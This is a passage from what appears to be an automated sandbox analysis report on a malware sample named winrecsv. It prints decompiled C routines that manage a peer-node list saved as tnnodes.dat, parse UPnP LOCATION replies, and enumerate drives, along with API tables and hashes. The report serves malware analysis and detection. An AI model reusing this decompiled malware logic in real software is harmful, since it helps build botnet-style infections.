                                                                                  				_v21 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v20 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_t54 = CreateFileW(_a4, 0x80000000, 0, 0, 3, 0, 0); // executed
                                                                                  				_v16 = _t54;
                                                                                  				if(_v16 == 0xffffffff) {
                                                                                  					L12:
                                                                                  					if(_v8 != 0) {
                                                                                  						_t56 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                  						_v16 = _t56;
                                                                                  						if(_v16 != 0xffffffff) {
                                                                                  							_v21 = 1;
                                                                                  							WriteFile(_v16, _v8, _v12,  &_v12, 0); // executed
                                                                                  							CloseHandle(_v16);
                                                                                  						}
                                                                                  						E00408FB0(_v8);
                                                                                  					}
                                                                                  					return _v21;
                                                                                  				}
                                                                                  				_t62 = CreateFileMappingW(_v16, 0, 2, 0, 0, 0); // executed
                                                                                  				_v28 = _t62;
                                                                                  				if(_v28 == 0) {
                                                                                  					L11:
                                                                                  					CloseHandle(_v16);
                                                                                  					goto L12;
                                                                                  				}
                                                                                  				_t64 = MapViewOfFile(_v28, 4, 0, 0, 0); // executed
                                                                                  				_v32 = _t64;
                                                                                  				if(_v32 == 0) {
                                                                                  					L10:
                                                                                  					CloseHandle(_v28);
                                                                                  					goto L11;
                                                                                  				} else {
                                                                                  					_v12 = GetFileSize(_v16, 0);
                                                                                  					if(_v12 > 0x100) {
                                                                                  						_t70 = E0040B4C0(_v32, _v32);
                                                                                  						_t103 = _t103 + 4;
                                                                                  						_v20 = _t70;
                                                                                  						if(_v20 != 0 && _v20[6] == _v12 - 0x100) {
                                                                                  							_v12 = _v20[6];
                                                                                  							_t73 = E0040AE60(_v32 + 0x100,  &(_v20[2]), 0x10, _v32 + 0x100, _v12);
                                                                                  							_t103 = _t103 + 0x10;
                                                                                  							_v8 = _t73;
                                                                                  							if(_v8 != 0) {
                                                                                  								E00409800(_v8, _v12,  &_v48);
                                                                                  								_t103 = _t103 + 0xc;
                                                                                  								asm("repe cmpsd");
                                                                                  								if(0 != 0) {
                                                                                  									E00408FB0(_v8);
                                                                                  									_t103 = _t103 + 4;
                                                                                  									_v8 = 0;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					UnmapViewOfFile(_v32);
                                                                                  					goto L10;
                                                                                  				}
                                                                                  			}


















                                                                                  0x0040d588
                                                                                  0x0040d58c
                                                                                  0x0040d593
                                                                                  0x0040d59a
                                                                                  0x0040d5b4
                                                                                  0x0040d5ba
                                                                                  0x0040d5c1
                                                                                  0x0040d6d3
                                                                                  0x0040d6d7
                                                                                  0x0040d6ec
                                                                                  0x0040d6f2
                                                                                  0x0040d6f9
                                                                                  0x0040d6fb
                                                                                  0x0040d711
                                                                                  0x0040d71b
                                                                                  0x0040d71b
                                                                                  0x0040d725
                                                                                  0x0040d72a
                                                                                  0x0040d735
                                                                                  0x0040d735
                                                                                  0x0040d5d5
                                                                                  0x0040d5db
                                                                                  0x0040d5e2
                                                                                  0x0040d6c9
                                                                                  0x0040d6cd
                                                                                  0x00000000
                                                                                  0x0040d6cd
                                                                                  0x0040d5f4
                                                                                  0x0040d5fa
                                                                                  0x0040d601
                                                                                  0x0040d6bf
                                                                                  0x0040d6c3
                                                                                  0x00000000
                                                                                  0x0040d607
                                                                                  0x0040d613
                                                                                  0x0040d61d
                                                                                  0x0040d627
                                                                                  0x0040d62c
                                                                                  0x0040d62f
                                                                                  0x0040d636
                                                                                  0x0040d64f
                                                                                  0x0040d669
                                                                                  0x0040d66e
                                                                                  0x0040d671
                                                                                  0x0040d678
                                                                                  0x0040d686
                                                                                  0x0040d68b
                                                                                  0x0040d69e
                                                                                  0x0040d6a0
                                                                                  0x0040d6a6
                                                                                  0x0040d6ab
                                                                                  0x0040d6ae
                                                                                  0x0040d6ae
                                                                                  0x0040d6a0
                                                                                  0x0040d678
                                                                                  0x0040d636
                                                                                  0x0040d6b9
                                                                                  0x00000000
                                                                                  0x0040d6b9

                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D5B4
                                                                                  • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D5D5
                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000), ref: 0040D5F4
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D60D
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040D6B9
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040D6C3
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D6CD
                                                                                  • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D6EC
                                                                                  • WriteFile.KERNELBASE(000000FF,00000000,00000000,00000000,00000000), ref: 0040D711
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D71B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWrite
                                                                                  • String ID:
                                                                                  • API String ID: 171974401-0
                                                                                  • Opcode ID: 0f9f188c6dc80e39ad04ba57d57415bc9a5561ea4dd1a5a43cd4d3438c38bcb4
                                                                                  • Instruction ID: abd0401628c18b29deb1849a45b8fcca8b7b44c39020343394329d6e44a62b50
                                                                                  • Opcode Fuzzy Hash: 0f9f188c6dc80e39ad04ba57d57415bc9a5561ea4dd1a5a43cd4d3438c38bcb4
                                                                                  • Instruction Fuzzy Hash: 06514DB5E00208FBDB14DFE4CC49BEEB775AB48704F108569E615772C0D7B96A84CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 342 409d70-409d87 call 409ab0 345 409d89 342->345 346 409d8e-409daa call 409820 strstr 342->346 347 409f34-409f37 345->347 350 409dac-409dc8 call 409820 strstr 346->350 351 409ded-409e03 EnterCriticalSection 346->351 360 409de8 350->360 361 409dca-409de6 call 409820 strstr 350->361 353 409e0e-409e17 351->353 354 409e48-409e53 call 409cc0 353->354 355 409e19-409e29 353->355 367 409f29-409f2e LeaveCriticalSection 354->367 368 409e59-409e67 354->368 357 409e46 355->357 358 409e2b-409e44 call 40c210 355->358 357->353 358->354 360->347 361->351 361->360 367->347 370 409e69 368->370 371 409e6d-409e6f call 408e40 368->371 370->371 373 409e74-409e7e 371->373 373->367 374 409e84-409ea1 call 40c210 373->374 377 409ea3-409eb2 374->377 378 409ef8-409f11 374->378 379 409eb4-409ebc Sleep 377->379 380 409ebe-409ef6 call 408fb0 377->380 381 409f17-409f22 call 409cc0 378->381 379->377 380->381 381->367 386 409f24 call 4099a0 381->386 386->367
                                                                                  C-Code - Quality: 100%
                                                                                  			E00409D70(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                  				signed char _v5;
                                                                                  				signed int _v12;
                                                                                  				signed int _v13;
                                                                                  				signed int _v20;
                                                                                  				signed char _t47;
                                                                                  				char* _t49;
                                                                                  				char* _t52;
                                                                                  				signed int _t56;
                                                                                  				void* _t60;
                                                                                  				char* _t63;
                                                                                  				signed int _t68;
                                                                                  				char* _t69;
                                                                                  				signed int _t71;
                                                                                  				signed int _t79;
                                                                                  				signed int _t81;
                                                                                  				intOrPtr _t83;
                                                                                  				char* _t85;
                                                                                  				void* _t87;
                                                                                  				void* _t88;
                                                                                  				void* _t90;
                                                                                  				void* _t94;
                                                                                  
                                                                                  				_t47 = E00409AB0(_a4); // executed
                                                                                  				_t88 = _t87 + 4;
                                                                                  				_t65 = _t47 & 0x000000ff;
                                                                                  				if((_t47 & 0x000000ff) == 0) {
                                                                                  					_t49 = strstr(E00409820(_t65, _a4), "127.");
                                                                                  					_t90 = _t88 + 0xc;
                                                                                  					__eflags = _t49;
                                                                                  					if(_t49 == 0) {
                                                                                  						L6:
                                                                                  						EnterCriticalSection(0x414e4c);
                                                                                  						_v5 = 0;
                                                                                  						_v12 = 0;
                                                                                  						while(1) {
                                                                                  							__eflags = _v12 -  *0x414e84; // 0x200
                                                                                  							if(__eflags >= 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t83 =  *((intOrPtr*)(0x414e88 + _v12 * 4));
                                                                                  							__eflags =  *((intOrPtr*)(_t83 + 4)) - _a4;
                                                                                  							if( *((intOrPtr*)(_t83 + 4)) != _a4) {
                                                                                  								_t85 = _v12 + 1;
                                                                                  								__eflags = _t85;
                                                                                  								_v12 = _t85;
                                                                                  								continue;
                                                                                  							}
                                                                                  							_t60 = E0040C210();
                                                                                  							_t50 = _t60 - _a8;
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v12 * 4)) + 8)) = _t60 - _a8;
                                                                                  							_v5 = 1;
                                                                                  							break;
                                                                                  						}
                                                                                  						E00409CC0(_t50);
                                                                                  						_t52 = _v5 & 0x000000ff;
                                                                                  						__eflags = _t52;
                                                                                  						if(_t52 != 0) {
                                                                                  							L23:
                                                                                  							LeaveCriticalSection(0x414e4c);
                                                                                  							return _t52;
                                                                                  						}
                                                                                  						_v13 = 0;
                                                                                  						__eflags =  *0x414e84 - 0x200;
                                                                                  						if( *0x414e84 == 0x200) {
                                                                                  							_v13 = 1;
                                                                                  						}
                                                                                  						_t52 = E00408E40(0xc); // executed
                                                                                  						_v20 = _t52;
                                                                                  						__eflags = _v20;
                                                                                  						if(_v20 == 0) {
                                                                                  							goto L23;
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_v20 + 4)) = _a4;
                                                                                  							 *((intOrPtr*)(_v20 + 8)) = E0040C210() - _a8;
                                                                                  							__eflags = _v13 & 0x000000ff;
                                                                                  							if((_v13 & 0x000000ff) == 0) {
                                                                                  								_t79 =  *0x414e84; // 0x200
                                                                                  								_t55 = _v20;
                                                                                  								 *((intOrPtr*)(0x414e88 + _t79 * 4)) = _v20;
                                                                                  								_t68 =  *0x414e84; // 0x200
                                                                                  								_t69 = _t68 + 1;
                                                                                  								__eflags = _t69;
                                                                                  								 *0x414e84 = _t69;
                                                                                  								L21:
                                                                                  								_t52 = E00409CC0(_t55);
                                                                                  								__eflags = _a12 & 0x000000ff;
                                                                                  								if((_a12 & 0x000000ff) != 0) {
                                                                                  									_t52 = E004099A0(_t52);
                                                                                  								}
                                                                                  								goto L23;
                                                                                  							} else {
                                                                                  								goto L17;
                                                                                  							}
                                                                                  							while(1) {
                                                                                  								L17:
                                                                                  								_t56 =  *0x414e84; // 0x200
                                                                                  								__eflags =  *(0x414e84[_t56]);
                                                                                  								if( *(0x414e84[_t56]) == 0) {
                                                                                  									break;
                                                                                  								}
                                                                                  								Sleep(1);
                                                                                  							}
                                                                                  							_t81 =  *0x414e84; // 0x200
                                                                                  							 *(0x414e84[_t81]) = 1;
                                                                                  							_t71 =  *0x414e84; // 0x200
                                                                                  							E00408FB0(0x414e84[_t71]);
                                                                                  							_t55 =  *0x414e84; // 0x200
                                                                                  							0x414e84[_t55] = _v20;
                                                                                  							goto L21;
                                                                                  						}
                                                                                  					}
                                                                                  					_t63 = strstr(E00409820(_t65, _a4), ".127");
                                                                                  					_t94 = _t90 + 0xc;
                                                                                  					__eflags = _t63;
                                                                                  					if(_t63 == 0) {
                                                                                  						L5:
                                                                                  						return _t63;
                                                                                  					}
                                                                                  					_t63 = strstr(E00409820(_a4, _a4), ".127.");
                                                                                  					_t90 = _t94 + 0xc;
                                                                                  					__eflags = _t63;
                                                                                  					if(_t63 != 0) {
                                                                                  						goto L6;
                                                                                  					}
                                                                                  					goto L5;
                                                                                  				}
                                                                                  				return _t47;
                                                                                  			}
























                                                                                  0x00409d7a
                                                                                  0x00409d7f
                                                                                  0x00409d82
                                                                                  0x00409d87
                                                                                  0x00409da0
                                                                                  0x00409da5
                                                                                  0x00409da8
                                                                                  0x00409daa
                                                                                  0x00409ded
                                                                                  0x00409df2
                                                                                  0x00409df8
                                                                                  0x00409dfc
                                                                                  0x00409e0e
                                                                                  0x00409e11
                                                                                  0x00409e17
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409e1c
                                                                                  0x00409e26
                                                                                  0x00409e29
                                                                                  0x00409e08
                                                                                  0x00409e08
                                                                                  0x00409e0b
                                                                                  0x00000000
                                                                                  0x00409e0b
                                                                                  0x00409e2b
                                                                                  0x00409e30
                                                                                  0x00409e3d
                                                                                  0x00409e40
                                                                                  0x00000000
                                                                                  0x00409e40
                                                                                  0x00409e48
                                                                                  0x00409e4d
                                                                                  0x00409e51
                                                                                  0x00409e53
                                                                                  0x00409f29
                                                                                  0x00409f2e
                                                                                  0x00000000
                                                                                  0x00409f2e
                                                                                  0x00409e59
                                                                                  0x00409e5d
                                                                                  0x00409e67
                                                                                  0x00409e69
                                                                                  0x00409e69
                                                                                  0x00409e6f
                                                                                  0x00409e77
                                                                                  0x00409e7a
                                                                                  0x00409e7e
                                                                                  0x00000000
                                                                                  0x00409e84
                                                                                  0x00409e8a
                                                                                  0x00409e98
                                                                                  0x00409e9f
                                                                                  0x00409ea1
                                                                                  0x00409ef8
                                                                                  0x00409efe
                                                                                  0x00409f01
                                                                                  0x00409f08
                                                                                  0x00409f0e
                                                                                  0x00409f0e
                                                                                  0x00409f11
                                                                                  0x00409f17
                                                                                  0x00409f17
                                                                                  0x00409f20
                                                                                  0x00409f22
                                                                                  0x00409f24
                                                                                  0x00409f24
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409ea3
                                                                                  0x00409ea3
                                                                                  0x00409ea3
                                                                                  0x00409eaf
                                                                                  0x00409eb2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409eb6
                                                                                  0x00409eb6
                                                                                  0x00409ebe
                                                                                  0x00409ecb
                                                                                  0x00409ed1
                                                                                  0x00409edf
                                                                                  0x00409ee7
                                                                                  0x00409eef
                                                                                  0x00000000
                                                                                  0x00409eef
                                                                                  0x00409e7e
                                                                                  0x00409dbe
                                                                                  0x00409dc3
                                                                                  0x00409dc6
                                                                                  0x00409dc8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409ddc
                                                                                  0x00409de1
                                                                                  0x00409de4
                                                                                  0x00409de6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409de6
                                                                                  0x00000000

                                                                                  APIs
                                                                                    • Part of subcall function 00409AB0: gethostname.WS2_32(?,00000100), ref: 00409ACC
                                                                                    • Part of subcall function 00409AB0: gethostbyname.WS2_32(?), ref: 00409ADE
                                                                                  • strstr.NTDLL ref: 00409DA0
                                                                                  • strstr.NTDLL ref: 00409DBE
                                                                                  • strstr.NTDLL ref: 00409DDC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: strstr$gethostbynamegethostname
                                                                                  • String ID: .127$.127.$127.
                                                                                  • API String ID: 2540993189-1573993753
                                                                                  • Opcode ID: f74cba095147121a9befcda7353e9145c5ad7863fe778667554f7ed7036415d4
                                                                                  • Instruction ID: 183aa7514d5840da55b51ccb33f3d2103a3eb28b4696c2bac9d1f078e1a22ee6
                                                                                  • Opcode Fuzzy Hash: f74cba095147121a9befcda7353e9145c5ad7863fe778667554f7ed7036415d4
                                                                                  • Instruction Fuzzy Hash: F45190B4944306DBCB04EF64E8417AA7BB5BB84304F14803EE805A73D2E779ED80CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 388 40c840-40c85a 389 40c86b-40c872 388->389 390 40c924-40c92d 389->390 391 40c878-40c897 recvfrom 389->391 392 40c8a6-40c8c3 StrCmpNIA 391->392 393 40c899-40c8a4 Sleep 391->393 395 40c8c5-40c8e4 StrStrIA 392->395 396 40c91f 392->396 394 40c85c-40c865 393->394 394->389 395->396 397 40c8e6-40c91d StrChrA call 40b640 395->397 396->394 397->396
                                                                                  C-Code - Quality: 79%
                                                                                  			E0040C840(intOrPtr __eax, intOrPtr _a4, intOrPtr* _a8) {
                                                                                  				char _v1028;
                                                                                  				char _v1029;
                                                                                  				intOrPtr _v1036;
                                                                                  				char* _v1040;
                                                                                  				char* _v1044;
                                                                                  				intOrPtr _t20;
                                                                                  				intOrPtr _t29;
                                                                                  				void* _t37;
                                                                                  
                                                                                  				_t20 = __eax;
                                                                                  				_v1029 = 0;
                                                                                  				_v1036 = 0;
                                                                                  				while(_v1036 < 2) {
                                                                                  					__imp__#17(_a4,  &_v1028, 0x400, 0, 0, 0); // executed
                                                                                  					if(_t20 != 0xffffffff) {
                                                                                  						_v1029 = 1;
                                                                                  						if(StrCmpNIA( &_v1028, "HTTP/1.1 200 OK", 0xf) == 0) {
                                                                                  							_v1040 = StrStrIA( &_v1028, "LOCATION: ");
                                                                                  							if(_v1040 != 0) {
                                                                                  								_v1044 = _v1040 + 0xa;
                                                                                  								_t29 = E0040B640(_v1044, _v1044, StrChrA(_v1044, 0xd) - _v1044);
                                                                                  								_t37 = _t37 + 8;
                                                                                  								 *_a8 = _t29;
                                                                                  							}
                                                                                  						}
                                                                                  					} else {
                                                                                  						Sleep(0x3e8); // executed
                                                                                  					}
                                                                                  					_t20 = _v1036 + 1;
                                                                                  					_v1036 = _t20;
                                                                                  				}
                                                                                  				return _v1029;
                                                                                  			}











                                                                                  0x0040c840
                                                                                  0x0040c849
                                                                                  0x0040c850
                                                                                  0x0040c86b
                                                                                  0x0040c88e
                                                                                  0x0040c897
                                                                                  0x0040c8a6
                                                                                  0x0040c8c3
                                                                                  0x0040c8d7
                                                                                  0x0040c8e4
                                                                                  0x0040c8ef
                                                                                  0x0040c912
                                                                                  0x0040c917
                                                                                  0x0040c91d
                                                                                  0x0040c91d
                                                                                  0x0040c8e4
                                                                                  0x0040c899
                                                                                  0x0040c89e
                                                                                  0x0040c89e
                                                                                  0x0040c862
                                                                                  0x0040c865
                                                                                  0x0040c865
                                                                                  0x0040c92d

                                                                                  APIs
                                                                                  • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C88E
                                                                                  • Sleep.KERNELBASE(000003E8), ref: 0040C89E
                                                                                  • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C8BB
                                                                                  • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C8D1
                                                                                  • StrChrA.SHLWAPI(?,0000000D), ref: 0040C8FE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleeprecvfrom
                                                                                  • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                  • API String ID: 668330359-3973262388
                                                                                  • Opcode ID: 2f358190d0f743e2d07f95898b3a29db7e7050231e642a267277ee9338021237
                                                                                  • Instruction ID: 9b34ca997a713d65cf6cd99f526d658ac5dfd41d516b48eadd98018a806326ed
                                                                                  • Opcode Fuzzy Hash: 2f358190d0f743e2d07f95898b3a29db7e7050231e642a267277ee9338021237
                                                                                  • Instruction Fuzzy Hash: 98216FF1940218EBDB20DB64DC89BE97774AB04308F1486E9E709B72C0D7B95AC68F5C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 400 4099a0-4099ad 401 4099b4-4099d2 call 408e60 400->401 402 4099af 400->402 403 409a8c-409a8f 401->403 406 4099d8-4099df 401->406 402->403 407 4099ea-4099f3 406->407 408 409a24-409a45 CreateFileW 407->408 409 4099f5-409a22 407->409 411 409a73-409a89 InterlockedExchange call 408fb0 408->411 412 409a47-409a6d WriteFile FlushFileBuffers CloseHandle 408->412 409->407 411->403 412->411
                                                                                  C-Code - Quality: 100%
                                                                                  			E004099A0(void* __eax) {
                                                                                  				void* _v8;
                                                                                  				long _v12;
                                                                                  				void* _v16;
                                                                                  				signed int _v20;
                                                                                  				long _v24;
                                                                                  				signed int _t36;
                                                                                  				void* _t38;
                                                                                  				void* _t40;
                                                                                  				signed int _t65;
                                                                                  
                                                                                  				if( *0x414e84 == 0) {
                                                                                  					return __eax;
                                                                                  				}
                                                                                  				_t36 =  *0x414e84; // 0x200
                                                                                  				_v12 = _t36 << 3;
                                                                                  				_t38 = E00408E60(_v12);
                                                                                  				_v8 = _t38;
                                                                                  				__eflags = _v8;
                                                                                  				if(_v8 != 0) {
                                                                                  					_v20 = 0;
                                                                                  					while(1) {
                                                                                  						__eflags = _v20 -  *0x414e84; // 0x200
                                                                                  						if(__eflags >= 0) {
                                                                                  							break;
                                                                                  						}
                                                                                  						 *((intOrPtr*)(_v8 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v20 * 4)) + 4));
                                                                                  						 *((intOrPtr*)(_v8 + 4 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v20 * 4)) + 8));
                                                                                  						_t65 = _v20 + 1;
                                                                                  						__eflags = _t65;
                                                                                  						_v20 = _t65;
                                                                                  					}
                                                                                  					_t40 = CreateFileW("C:\Users\frontdesk\tnnodes.dat", 0x40000000, 0, 0, 2, 2, 0); // executed
                                                                                  					_v16 = _t40;
                                                                                  					__eflags = _v16 - 0xffffffff;
                                                                                  					if(_v16 != 0xffffffff) {
                                                                                  						WriteFile(_v16, _v8, _v12,  &_v24, 0); // executed
                                                                                  						FlushFileBuffers(_v16);
                                                                                  						CloseHandle(_v16);
                                                                                  					}
                                                                                  					InterlockedExchange(0x4133b4, 0x3d);
                                                                                  					return E00408FB0(_v8);
                                                                                  				}
                                                                                  				return _t38;
                                                                                  			}












                                                                                  0x004099ad
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004099b4
                                                                                  0x004099bc
                                                                                  0x004099c3
                                                                                  0x004099cb
                                                                                  0x004099ce
                                                                                  0x004099d2
                                                                                  0x004099d8
                                                                                  0x004099ea
                                                                                  0x004099ed
                                                                                  0x004099f3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409a08
                                                                                  0x00409a1e
                                                                                  0x004099e4
                                                                                  0x004099e4
                                                                                  0x004099e7
                                                                                  0x004099e7
                                                                                  0x00409a38
                                                                                  0x00409a3e
                                                                                  0x00409a41
                                                                                  0x00409a45
                                                                                  0x00409a59
                                                                                  0x00409a63
                                                                                  0x00409a6d
                                                                                  0x00409a6d
                                                                                  0x00409a7a
                                                                                  0x00000000
                                                                                  0x00409a89
                                                                                  0x00409a8f

                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(C:\Users\user\tnnodes.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00409A38
                                                                                  • WriteFile.KERNELBASE(000000FF,00000000,?,?,00000000), ref: 00409A59
                                                                                  • FlushFileBuffers.KERNEL32(000000FF), ref: 00409A63
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00409A6D
                                                                                  • InterlockedExchange.KERNEL32(004133B4,0000003D), ref: 00409A7A
                                                                                  Strings
                                                                                  • C:\Users\user\tnnodes.dat, xrefs: 00409A33
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                  • String ID: C:\Users\user\tnnodes.dat
                                                                                  • API String ID: 442028454-238434947
                                                                                  • Opcode ID: 041b73d5b942429564a4579fd955c60e5901b8d3da01b6d0c2a702c2e683ff31
                                                                                  • Instruction ID: 85340a07573b5f562dbc2fb3f1b8785e1f65b23dd5aeba6ef7127c009f103e88
                                                                                  • Opcode Fuzzy Hash: 041b73d5b942429564a4579fd955c60e5901b8d3da01b6d0c2a702c2e683ff31
                                                                                  • Instruction Fuzzy Hash: A6317AB8A00209EBCB14CF94ED45FAEB3B5FB88300F208169E511A7391D774AE41CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 415 4048c0-4048eb GetLogicalDrives 416 4048f6-4048fa 415->416 417 404966-404971 416->417 418 4048fc-40491c RegOpenKeyExW 416->418 419 404964 418->419 420 40491e-404949 RegQueryValueExW 418->420 419->416 421 40495a-40495e RegCloseKey 420->421 422 40494b-40494f 420->422 421->419 422->421 424 404951-404957 422->424 424->421
                                                                                  C-Code - Quality: 100%
                                                                                  			E004048C0() {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				signed int _v16;
                                                                                  				signed int _v20;
                                                                                  				signed int _v24;
                                                                                  				void* _v28;
                                                                                  				char _v32;
                                                                                  				int _v36;
                                                                                  				long _t26;
                                                                                  				long _t31;
                                                                                  				long _t35;
                                                                                  				void* _t44;
                                                                                  
                                                                                  				_t26 = GetLogicalDrives(); // executed
                                                                                  				_v20 = _t26;
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0x80000002;
                                                                                  				_v8 = 0x80000001;
                                                                                  				_v24 = 0;
                                                                                  				while(_v24 < 2) {
                                                                                  					_t31 = RegOpenKeyExW( *(_t44 + _v24 * 4 - 8), L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, 0x20019,  &_v28); // executed
                                                                                  					if(_t31 == 0) {
                                                                                  						_v32 = 0;
                                                                                  						_v36 = 4;
                                                                                  						_t35 = RegQueryValueExW(_v28, L"NoDrives", 0, 0,  &_v32,  &_v36); // executed
                                                                                  						if(_t35 == 0 && _v32 != 0) {
                                                                                  							_v16 = _v16 | _v32;
                                                                                  						}
                                                                                  						RegCloseKey(_v28);
                                                                                  					}
                                                                                  					_v24 = _v24 + 1;
                                                                                  				}
                                                                                  				return  !_v16 & _v20;
                                                                                  			}















                                                                                  0x004048c6
                                                                                  0x004048cc
                                                                                  0x004048cf
                                                                                  0x004048d6
                                                                                  0x004048dd
                                                                                  0x004048e4
                                                                                  0x004048f6
                                                                                  0x00404914
                                                                                  0x0040491c
                                                                                  0x0040491e
                                                                                  0x00404925
                                                                                  0x00404941
                                                                                  0x00404949
                                                                                  0x00404957
                                                                                  0x00404957
                                                                                  0x0040495e
                                                                                  0x0040495e
                                                                                  0x004048f3
                                                                                  0x004048f3
                                                                                  0x00404971

                                                                                  APIs
                                                                                  • GetLogicalDrives.KERNELBASE ref: 004048C6
                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404914
                                                                                  • RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404941
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040495E
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00404907
                                                                                  • NoDrives, xrefs: 00404938
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
